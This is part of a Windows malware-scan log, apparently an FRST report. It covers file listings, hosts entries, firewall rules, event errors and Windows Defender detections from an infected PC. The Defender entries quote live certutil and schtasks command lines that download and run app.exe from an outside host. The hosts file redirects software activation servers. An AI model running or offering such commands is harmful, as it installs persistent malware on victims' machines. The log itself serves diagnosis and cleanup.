12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctspkhlp.DLL 2017-08-26 16:54 - 2017-08-26 16:54 - 000410112 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll 2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll 2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL 2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll 
2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll 2019-11-24 19:12 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\idp.dll 2015-04-17 17:30 - 2015-04-17 17:30 - 000139264 _____ (Packetizer, Inc.) 
[File not signed] C:\Program Files\AESCrypt\AESCrypt.dll
2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\Windows\System32\pdfcmon.dll
2019-11-24 19:12 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\psvince.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:907E90B1 [246]
AlternateDataStreams: C:\Users\SR\AppData\Local\OPTvJO7k:lSGoicsydMwI75AardtQAZCSFhB [2296]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1 precisionmanuals.com
127.0.0.1 www.precisionmanuals.com
127.0.0.1 license.precisionmanuals.com
127.0.0.1 auth.cycling74.com
127.0.0.1 auth64.cycling74.com
127.0.0.1 www.techsmith.com
127.0.0.1 activation.cloud.techsmith.com
127.0.0.1 oscount.techsmith.com
127.0.0.1 updater.techsmith.com
127.0.0.1 camtasiatudi.techsmith.com
127.0.0.1 tsccloud.cloudapp.net
127.0.0.1 assets.cloud.techsmith.com
127.0.0.1 65.52.240.48
127.0.0.1 oscount.techsmith.com
127.0.0.1 69.167.144.18
127.0.0.1 www.techsmith.com
127.0.0.1 activation.cloud.techsmith.com
127.0.0.1 oscount.techsmith.com
127.0.0.1 updater.techsmith.com
127.0.0.1 camtasiatudi.techsmith.com
127.0.0.1 tsccloud.cloudapp.net
127.0.0.1 assets.cloud.techsmith.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AsioThk32Reg"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.) FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.) FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.) 
FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed] FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed] FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318 FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed] FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed] FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => 
(Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File FirewallRules: [UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.) FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed] FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed] FirewallRules: [{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed] FirewallRules: [{CB2B1E04-1443-4466-A2D4-6FECE639BD29}] => (Allow) C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) 
[File not signed] ==================== Restore Points ========================= 19-11-2019 13:12:33 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============ ==================== Event log errors: ======================== Application errors: ================== Error: (11/24/2019 07:35:57 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:12:42 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:12:09 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. 
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:07:44 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:07:12 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:01:40 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. 
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 07:01:07 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/24/2019 06:57:31 PM) (Source: MsiInstaller) (EventID: 10005) (User: DESKTOP-A0OS1Q6)
Description: Product: Online Application -- Error 4106. An error was encountered while creating a scheduled task: 'Online Application V2G1.job'. Error description: The parameter is incorrect.

System errors:
=============
Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscDataProtection and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscBrokerManager and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscBrokerManager and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscBrokerManager and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Malwarebytes Service service failed to start due to the following error: Access is denied.

Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Malwarebytes Service service failed to start due to the following error: Access is denied.
Error: (11/24/2019 07:12:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} and APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} to the user NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/24/2019 07:11:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Windows Defender:
===================================
Date: 2019-11-24 19:12:13.754
Description: Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:12:11.511
Description: Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:55.432
Description: Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bomitag.D!ml&threatid=2147741007&enterprise=0
Name: Trojan:Win32/Bomitag.D!ml
ID: 2147741007
Severity: Severe
Category: Trojan
Path: file:_C:\Program Files (x86)\Hadadn\68060836.exe; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:39.663
Description: Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-24 19:07:39.626
Description: Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Neobar&threatid=225451&enterprise=0
Name: BrowserModifier:Win32/Neobar
ID: 225451
Severity: High
Category: Browser Modifier
Path: regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\csrss; regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\wup; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{291DB7AE-2C1B-4863-B103-F71CA48986BA}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckIE; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckU; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckUn; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program File
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

CodeIntegrity:
===================================
Date: 2019-10-29 09:57:25.835
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-08-03 12:16:27.456
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-07-08 12:00:17.288
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2019-05-04 12:47:46.475
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-03-15 11:40:11.320
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-26 12:31:13.039
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 26%
Total physical RAM: 16331.55 MB
Available physical RAM: 12012.87 MB
Total Virtual: 16631.55 MB
Available Virtual: 10766.25 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:231.78 GB) (Free:62.77 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:152.18 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:203.93 GB) NTFS
Drive h: (Seagate Expansion Drive) (Fixed) (Total:1863.01 GB) (Free:921.95 GB) NTFS
Drive p: () (Fixed) (Total:5 GB) (Free:0.35 GB) exFAT

\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)
Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==========================================================
